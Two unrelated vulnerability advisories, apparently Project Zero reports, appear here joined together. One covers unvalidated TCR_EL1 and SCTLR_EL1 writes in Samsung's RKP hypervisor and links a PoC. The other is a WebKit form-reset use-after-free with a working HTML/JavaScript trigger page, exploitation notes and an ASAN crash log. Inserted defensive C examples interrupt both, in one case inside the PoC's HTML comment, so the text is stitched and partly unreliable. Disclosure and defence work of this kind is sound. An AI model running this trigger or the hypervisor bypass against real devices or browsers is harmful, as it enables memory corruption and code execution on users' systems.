In order to prevent EL0 and EL1 code from creating disallowed memory mappings (e.g., disabling PXN on areas not in the kernel text or enabling write permissions to a kernel code page), RKP employs a system through which all modifications to the S1 translation table are validated by the hypervisor. Moreover, RKP marks the EL0 and EL1 translation tables as read-only in the stage 2 translation table for EL0/1.

Normally, an adversary running in EL1 would be able to directly modify the value of TTBR0_EL1 and TTBR1_EL1, which would allow them to subvert the S1 protections. However, RKP correctly traps such MSRs in order to make sure any new translation table is also verified.

Specifically, when an MSR to a memory management control register is executed by EL1, it triggers a synchronous exception in the hypervisor. In the case of RKP, this exception is handled by the function "vmm_synchronous_handler". The function checks whether the abort is due to an MRS/MSR from EL1, and if so, calls the function "other_msr_system" in order to service the request.

As mentioned above - RKP does, in fact, verify the translation tables when set via TTBR0 and TTBR1 (by calling "rkp_l1pgt_ttbr"). However, for MSRs targeting the TCR_EL1 and SCTLR_EL1 registers, it directly modifies their value from EL2 without performing any validation.

These two registers are extremely sensitive and modifying their values allows an attacker to subvert the RKP memory protections.

TCR_EL1
-------
In the case of TCR_EL1, the attacker can set TCR_EL1.TG0 or TCR_EL1.TG1 in order to signal that the translation granule for TTBR0 or TTBR1 (accordingly) is any value other than the default 4KB granule used by the Linux Kernel.

Modifying the translation granule allows an attacker to subvert the stage-1 memory mapping restrictions used by RKP. This is since RKP incorrectly assumes that the translation granule is 4KB without actually checking the value in TCR_EL1.TGx.

For example, when protecting the translation table in TTBRx_EL1, RKP only s2-protects a 4KB region - since when using the 4KB granule, the translation regime has a translation table size of 4KB. However, for a translation granule of 64KB, the translation regime has a translation table size of 64KB.

This means that the bottom 60KB of the translation table remain unprotected by RKP, allowing an attacker in EL1 to freely modify it in order to point to any wanted IPA, with any AP and PXN/UXN values.


SCTLR_EL1
---------
In the case of SCTLR_EL1, the attacker can unset SCTLR_EL1.M in order to disable the stage 1 MMU for EL0 and EL1 translations. This would allow an attacker to trivially bypass the stage-1 protections (such as the ones discussed above), as no AP or XN permission checks would be present for stage 1 translations.


Lastly, it should be noted that while these MSRs might not be present in the kernel's code, they *are* present in RKP's code. As RKP's code pages are executable from EL1, an attacker can simply call these MSRs directly from RKP's code while running in EL1.
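
An added example, not RKP's code, of the validation a trap handler could apply before emulating these two MSRs: a TCR_EL1 value is accepted only when TG0 and TG1 both select the 4KB granule, and an SCTLR_EL1 value only when M stays set. The field positions are the architectural ones; the function, enum and structure names and the sample TCR value are hypothetical.

```c
#include <stdint.h>
#include <stdio.h>

enum el1_sysreg  { REG_TCR_EL1, REG_SCTLR_EL1 };
enum msr_verdict { MSR_ALLOW, MSR_DENY_GRANULE, MSR_DENY_MMU_OFF, MSR_DENY_UNKNOWN };

/* Architectural field positions (ARMv8-A). */
#define TCR_TG0_SHIFT 14            /* TCR_EL1.TG0, bits [15:14] */
#define TCR_TG1_SHIFT 30            /* TCR_EL1.TG1, bits [31:30] */
#define SCTLR_M       (1ULL << 0)   /* SCTLR_EL1.M, stage 1 MMU enable */

/* Constructed sample: T0SZ = T1SZ = 25, TG0 = 4KB (0b00), TG1 = 4KB (0b10). */
#define EXAMPLE_TCR (25ULL | (25ULL << 16) | (2ULL << TCR_TG1_SHIFT))

/* Granule size in KB selected by TG0 (0 for the reserved encoding). */
static unsigned tg0_kb(uint64_t tcr)
{
    switch ((tcr >> TCR_TG0_SHIFT) & 3) {
    case 0:  return 4;
    case 1:  return 64;
    case 2:  return 16;
    default: return 0;
    }
}

/* TG1 uses a different encoding from TG0. */
static unsigned tg1_kb(uint64_t tcr)
{
    switch ((tcr >> TCR_TG1_SHIFT) & 3) {
    case 1:  return 16;
    case 2:  return 4;
    case 3:  return 64;
    default: return 0;
    }
}

/* Policy applied to a value EL1 tried to write after RKP_INIT. */
enum msr_verdict validate_el1_msr(enum el1_sysreg reg, uint64_t value)
{
    switch (reg) {
    case REG_TCR_EL1:
        /* The table protections assume 4 KB tables, so only that granule passes. */
        if (tg0_kb(value) != 4 || tg1_kb(value) != 4)
            return MSR_DENY_GRANULE;
        return MSR_ALLOW;
    case REG_SCTLR_EL1:
        /* Clearing M would turn off every stage 1 permission check. */
        if (!(value & SCTLR_M))
            return MSR_DENY_MMU_OFF;
        return MSR_ALLOW;
    default:
        return MSR_DENY_UNKNOWN;
    }
}

struct el1_regs { uint64_t tcr_el1, sctlr_el1; };

/* Emulate the trapped write: the shadow register changes only on MSR_ALLOW. */
enum msr_verdict emulate_el1_msr(struct el1_regs *regs, enum el1_sysreg reg, uint64_t value)
{
    enum msr_verdict v = validate_el1_msr(reg, value);

    if (v != MSR_ALLOW)
        return v;
    if (reg == REG_TCR_EL1)
        regs->tcr_el1 = value;
    else
        regs->sctlr_el1 = value;
    return MSR_ALLOW;
}

int main(void)
{
    struct el1_regs regs = { EXAMPLE_TCR, SCTLR_M };

    printf("TCR_EL1 with TG0=64KB: verdict %d\n",
           emulate_el1_msr(&regs, REG_TCR_EL1, EXAMPLE_TCR | (1ULL << TCR_TG0_SHIFT)));
    printf("SCTLR_EL1 with M=0:    verdict %d\n",
           emulate_el1_msr(&regs, REG_SCTLR_EL1, 0));
    printf("TCR_EL1 unchanged:     %s\n", regs.tcr_el1 == EXAMPLE_TCR ? "yes" : "no");
    return 0;
}
```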

I've statically verified this issue on the RKP binary (version "RKP4.2_CL7572479") present in the open-source kernel package "SM-G935F_MM_Opensource".

Proof of concept for the RKP unprotected MSRs issue.

This PoC disables the M bit in SCTLR_EL1.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41212.zip
            
<!-- Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1044 -->

<script>

function go() {

  output.value = "aaa";
  output.appendChild(inserted_div);

  document.getElementById("output").addEventListener('DOMSubtreeModified', function () {
    for(var i=0; i<20; i++) {
      form.appendChild(document.createElement("input"));
    }
  }, false);

  form.reset();

}

</script>
<body onload=go()>
<div id="inserted_div">foo</div>
<form id="form" onchange="eventhandler()">
<input type="text" value="foo">
<output id="output" oninput="eventhandler()"></output>
<input type="text" value="foo">

<!--
=================================================================

Analysis:

The bug is in HTMLFormElement::reset() function, specifically in this part:

    for (auto& associatedElement : m_associatedElements) {
        if (is<HTMLFormControlElement>(*associatedElement))
            downcast<HTMLFormControlElement>(*associatedElement).reset();
    }

The issue is that while m_associatedElements vector is being iterated, its content can change (HTMLFormControlElement being added or removed from it).

Normally HTMLFormControlElement.reset() doesn't change the DOM, but there is one exception to this: The 'output' element. In WebKit, resetting the output element is equivalent to setting its textContent, which causes all of its child elements (if any) to be removed from the DOM tree.

Using this trick we can remove elements from m_associatedElements while it is being iterated. However, this by itself is not sufficient to exploit this issue as m_associatedElements.remove(index) (called from HTMLFormElement::removeFormElement()) won't actually reallocate the vector's buffer, it will only decrease vector's m_size and the vector's elements after m_size will still point to the (former) form members. (It might be possible to force the removed form members to be deleted but I haven't experimented with this).

So instead of removing elements from the m_associatedElements vector, I instead add elements to it while it is being iterated. I did this by adding a DOMSubtreeModified event listener to the output element, so that when the output element gets reset, the event triggers and in the event handler newly created input elements are added to the form. This causes the vector's buffer to be reallocated to accommodate the new form elements. The loop inside HTMLFormElement::reset() continues to iterate over the now-deleted buffer, causing the use-after-free condition.

If an attacker manages to reclaim the space of the freed buffer and fill it with attacker-controlled data (there is plenty of opportunity to do this inside the DOMSubtreeModified event handler. Also note that the size of the freed buffer can be chosen by the attacker), subsequent iterations over m_associatedElements will cause HTMLFormControlElement::reset() method to be called on the attacker-controlled pointer. Since HTMLFormControlElement::reset() is a virtual function, this can easily lead to code execution.
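
The usual defensive pattern for this class of bug, as an added example in C (a simplified model, not WebKit's code or its fix; all names are hypothetical): reset iterates over a private snapshot that holds its own references, so a handler that grows the form during the loop cannot invalidate what is being iterated.

```c
#include <stdio.h>
#include <stdlib.h>

struct form;
/* Minimal stand-ins (hypothetical, not WebKit's classes). */
struct control {
    int refs;                          /* reference count */
    int resets;                        /* times reset ran on this control */
    void (*on_reset)(struct form *f);  /* side effect of reset, e.g. an event handler */
};
struct form { struct control **items; size_t size, cap; };  /* items models m_associatedElements */

static struct control *control_new(void (*hook)(struct form *))
{
    struct control *c = calloc(1, sizeof *c);
    if (c) { c->refs = 1; c->on_reset = hook; }
    return c;
}

static void control_release(struct control *c)
{
    c->refs -= 1;
    if (c->refs == 0) free(c);
}

/* Append a control. Growing the array may move it and free the old buffer. */
int form_add(struct form *f, struct control *c)
{
    if (f->size == f->cap) {
        size_t ncap = f->cap ? f->cap * 2 : 4;
        struct control **n = realloc(f->items, ncap * sizeof *n);
        if (!n) return -1;
        f->items = n;
        f->cap = ncap;
    }
    c->refs += 1;
    f->items[f->size++] = c;
    return 0;
}

/* Reset the controls present at call time by iterating over a private snapshot
 * that holds its own references. Returns the number reset, or -1 on failure. */
int form_reset(struct form *f)
{
    size_t n = f->size;
    if (n == 0) return 0;
    struct control **snap = malloc(n * sizeof *snap);
    if (!snap) return -1;
    for (size_t i = 0; i < n; i++) {
        snap[i] = f->items[i];
        snap[i]->refs += 1;            /* keep it alive even if a hook removes it */
    }
    for (size_t i = 0; i < n; i++) {
        snap[i]->resets += 1;
        if (snap[i]->on_reset) snap[i]->on_reset(f);   /* may grow or move f->items */
    }
    for (size_t i = 0; i < n; i++) control_release(snap[i]);
    free(snap);
    return (int)n;
}

/* Hook modelled on the test case: add 20 controls while reset is running. */
static void add_twenty(struct form *f)
{
    for (int i = 0; i < 20; i++) {
        struct control *c = control_new(NULL);
        if (!c) return;
        form_add(f, c);
        control_release(c);            /* the form now holds the only reference */
    }
}

/* Returns the number of controls reset, or -1 if the per-control counts are wrong. */
int run_reset_demo(size_t *final_size)
{
    struct form f = { NULL, 0, 0 };
    for (int i = 0; i < 3; i++) {      /* three controls, the middle one has the hook */
        struct control *c = control_new(i == 1 ? add_twenty : NULL);
        if (!c) abort();
        form_add(&f, c);
        control_release(c);
    }
    int visited = form_reset(&f);
    *final_size = f.size;
    for (size_t i = 0; i < f.size; i++) {
        if (f.items[i]->resets != (i < 3 ? 1 : 0)) visited = -1;
        control_release(f.items[i]);
    }
    free(f.items);
    return visited;
}

int main(void)
{
    size_t size = 0;
    int n = run_reset_demo(&size);
    printf("reset %d controls, form now has %zu entries\n", n, size);
    return 0;
}
```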

ASAN log:

=================================================================
==1963==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c0000a2c50 at pc 0x000109144e28 bp 0x7fff5ee93e10 sp 0x7fff5ee93e08
READ of size 8 at 0x60c0000a2c50 thread T0
    #0 0x109144e27 in WebCore::HTMLFormElement::reset() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc2be27)
    #1 0x1099b32e0 in WebCore::jsHTMLFormElementPrototypeFunctionResetCaller(JSC::ExecState*, WebCore::JSHTMLFormElement*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x149a2e0)
    #2 0x1099b0cdd in long long WebCore::BindingCaller<WebCore::JSHTMLFormElement>::callOperation<&(WebCore::jsHTMLFormElementPrototypeFunctionResetCaller(JSC::ExecState*, WebCore::JSHTMLFormElement*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1497cdd)
    #3 0x2e505aa01027  (<unknown module>)
    #4 0x105d07f0c in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x126af0c)
    #5 0x105d07f0c in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x126af0c)
    #6 0x105d014da in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12644da)
    #7 0x1059a1c5d in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xf04c5d)
    #8 0x105908033 in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xe6b033)
    #9 0x104f718d1 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x4d48d1)
    #10 0x104f719fb in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x4d49fb)
    #11 0x104f71d46 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x4d4d46)
    #12 0x1095a9e2e in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1090e2e)
    #13 0x109894c66 in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext*, WebCore::Event*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x137bc66)
    #14 0x108dea325 in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener>, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8d1325)
    #15 0x108de9e4f in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8d0e4f)
    #16 0x108cd52f1 in WebCore::DOMWindow::dispatchEvent(WebCore::Event&, WebCore::EventTarget*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7bc2f1)
    #17 0x108ce4ebf in WebCore::DOMWindow::dispatchLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7cbebf)
    #18 0x108bf105f in WebCore::Document::dispatchWindowLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x6d805f)
    #19 0x108bebdae in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x6d2dae)
    #20 0x108f57481 in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa3e481)
    #21 0x108f5496a in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa3b96a)
    #22 0x108c098ed in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x6f08ed)
    #23 0x10910721d in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xbee21d)
    #24 0x108ca018c in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x78718c)
    #25 0x108c645ef in WebCore::DocumentLoader::finishedLoading(double) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x74b5ef)
    #26 0x10876f577 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x256577)
    #27 0x10876a479 in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x251479)
    #28 0x10acc2f84 in WebCore::SubresourceLoader::didFinishLoading(double) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x27a9f84)
    #29 0x101662f95 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(double)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(double)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x8def95)
    #30 0x1016625aa in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x8de5aa)
    #31 0x1010126a9 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x28e6a9)
    #32 0x100e320a8 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0xae0a8)
    #33 0x100e3b274 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0xb7274)
    #34 0x1062d3964 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1836964)
    #35 0x1062d427e in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x183727e)
    #36 0x7fff96c637e0 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0xaa7e0)
    #37 0x7fff96c42f1b in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x89f1b)
    #38 0x7fff96c4243e in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x8943e)
    #39 0x7fff96c41e37 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x88e37)
    #40 0x7fff8cad1934 in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x30934)
    #41 0x7fff8cad176e in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x3076e)
    #42 0x7fff8cad15ae in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x305ae)
    #43 0x7fff8a8fcdf5 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x48df5)
    #44 0x7fff8a8fc225 in -[NSApplication _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x48225)
    #45 0x7fff8a8f0d7f in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x3cd7f)
    #46 0x7fff8a8ba367 in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x6367)
    #47 0x7fff82c7c193 in _xpc_objc_main (/usr/lib/system/libxpc.dylib+0x11193)
    #48 0x7fff82c7abbd in xpc_main (/usr/lib/system/libxpc.dylib+0xfbbd)
    #49 0x100d69b73 in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development+0x100001b73)
    #50 0x7fff8a7fa5ac in start (/usr/lib/system/libdyld.dylib+0x35ac)

0x60c0000a2c50 is located 16 bytes inside of 128-byte region [0x60c0000a2c40,0x60c0000a2cc0)
freed by thread T0 here:
    #0 0x103345db9 in wrap_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x4adb9)
    #1 0x10632602b in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x188902b)
    #2 0x109148b53 in WTF::Vector<WebCore::FormAssociatedElement*, 0ul, WTF::CrashOnOverflow, 16ul>::expandCapacity(unsigned long, WebCore::FormAssociatedElement**) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc2fb53)
    #3 0x109145d00 in void WTF::Vector<WebCore::FormAssociatedElement*, 0ul, WTF::CrashOnOverflow, 16ul>::insert<WebCore::FormAssociatedElement*&>(unsigned long, WebCore::FormAssociatedElement*&&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc2cd00)
    #4 0x109145b80 in WebCore::HTMLFormElement::registerFormElement(WebCore::FormAssociatedElement*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc2cb80)
    #5 0x108ef9f98 in WebCore::FormAssociatedElement::setForm(WebCore::HTMLFormElement*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x9e0f98)
    #6 0x108efa80e in WebCore::FormAssociatedElement::resetFormOwner() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x9e180e)
    #7 0x109163a0d in WebCore::HTMLInputElement::finishedInsertingSubtree() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc4aa0d)
    #8 0x1088827d8 in WebCore::ContainerNode::notifyChildInserted(WebCore::Node&, WebCore::ContainerNode::ChildChangeSource) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x3697d8)
    #9 0x108882442 in WebCore::ContainerNode::updateTreeAfterInsertion(WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x369442)
    #10 0x108881f38 in WebCore::ContainerNode::appendChildWithoutPreInsertionValidityCheck(WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x368f38)
    #11 0x108884536 in WebCore::ContainerNode::appendChild(WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x36b536)
    #12 0x10a364e8b in WebCore::Node::appendChild(WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1e4be8b)
    #13 0x109ba6f87 in WebCore::JSNode::appendChild(JSC::ExecState&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x168df87)
    #14 0x109ba4021 in WebCore::jsNodePrototypeFunctionAppendChildCaller(JSC::ExecState*, WebCore::JSNode*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x168b021)
    #15 0x109ba0572 in long long WebCore::BindingCaller<WebCore::JSNode>::callOperation<&(WebCore::jsNodePrototypeFunctionAppendChildCaller(JSC::ExecState*, WebCore::JSNode*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1687572)
    #16 0x109ba041e in WebCore::jsNodePrototypeFunctionAppendChild(JSC::ExecState*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x168741e)
    #17 0x2e505aa01027  (<unknown module>)
    #18 0x105d07e9a in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x126ae9a)
    #19 0x105d014da in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12644da)
    #20 0x1059a1c5d in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xf04c5d)
    #21 0x105908033 in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xe6b033)
    #22 0x104f718d1 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x4d48d1)
    #23 0x104f719fb in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x4d49fb)
    #24 0x104f71d46 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x4d4d46)
    #25 0x1095a9e2e in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1090e2e)
    #26 0x109894c66 in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext*, WebCore::Event*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x137bc66)
    #27 0x108dea325 in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener>, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8d1325)
    #28 0x108de9e4f in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8d0e4f)
    #29 0x108db3275 in WebCore::EventContext::handleLocalEvents(WebCore::Event&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x89a275)

previously allocated by thread T0 here:
    #0 0x103345bf0 in wrap_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x4abf0)
    #1 0x10631af5e in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x187df5e)
    #2 0x1062b4f75 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1817f75)
    #3 0x1091334b0 in WTF::VectorBufferBase<WebCore::FormAssociatedElement*>::allocateBuffer(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc1a4b0)
    #4 0x1091337d3 in WTF::Vector<WebCore::FormAssociatedElement*, 0ul, WTF::CrashOnOverflow, 16ul>::reserveCapacity(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc1a7d3)
    #5 0x109148b53 in WTF::Vector<WebCore::FormAssociatedElement*, 0ul, WTF::CrashOnOverflow, 16ul>::expandCapacity(unsigned long, WebCore::FormAssociatedElement**) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc2fb53)
    #6 0x109145d00 in void WTF::Vector<WebCore::FormAssociatedElement*, 0ul, WTF::CrashOnOverflow, 16ul>::insert<WebCore::FormAssociatedElement*&>(unsigned long, WebCore::FormAssociatedElement*&&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc2cd00)
